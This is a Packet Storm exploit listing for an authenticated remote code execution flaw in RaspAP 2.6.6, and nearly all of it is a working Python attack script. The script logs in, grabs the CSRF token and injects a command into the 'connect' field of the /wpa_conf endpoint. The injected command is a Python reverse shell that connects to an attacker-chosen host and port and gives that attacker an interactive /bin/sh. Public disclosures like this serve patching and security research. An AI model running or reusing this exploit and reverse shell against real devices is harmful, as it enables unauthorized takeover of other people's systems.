RaspAP 2.6.6 Remote Code Execution

🗓️ 23 Aug 2021 00:00:00Reported by Moritz GruberType

packetstorm🔗 packetstormsecurity.com👁 274 Views

RaspAP 2.6.6 Remote Code Execution (Authenticated

`# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)  
# Date: 23.08.2021  
# Exploit Author: Moritz Gruber <[email protected]>  
# Vendor Homepage: https://raspap.com/  
# Software Link: https://github.com/RaspAP/raspap-webgui  
# Version: 2.6.6  
# Tested on: Linux raspberrypi 5.10.52-v7+  
  
import requests  
from requests.api import post  
from requests.auth import HTTPBasicAuth  
from bs4 import BeautifulSoup  
import sys, re  
  
if len(sys.argv) != 7:  
print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")  
sys.exit()  
else:   
target_host = sys.argv[1]  
target_port = sys.argv[2]  
username = sys.argv[3]  
password = sys.argv[4]  
listener_host = sys.argv[5]  
listener_port = sys.argv[6]  
  
endpoint = "/wpa_conf"  
exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"  
url = "http://{}:{}/{}".format(target_host,target_port,endpoint)  
  
s = requests.Session()  
  
get_Request = s.get(url, auth=HTTPBasicAuth(username, password))  
soup = BeautifulSoup(get_Request.text, "lxml")  
csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")  
  
post_data = {  
"csrf_token": csrf_token,  
"connect": "wlan; {}".format(exploit)  
}  
post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))  
if post_Request.status_code:  
print("Exploit send.")  
else:  
print("Something went wrong.")  
print("Done")  
  
`

23 Aug 2021 00:00Current

7.4High risk

Vulners AI Score7.4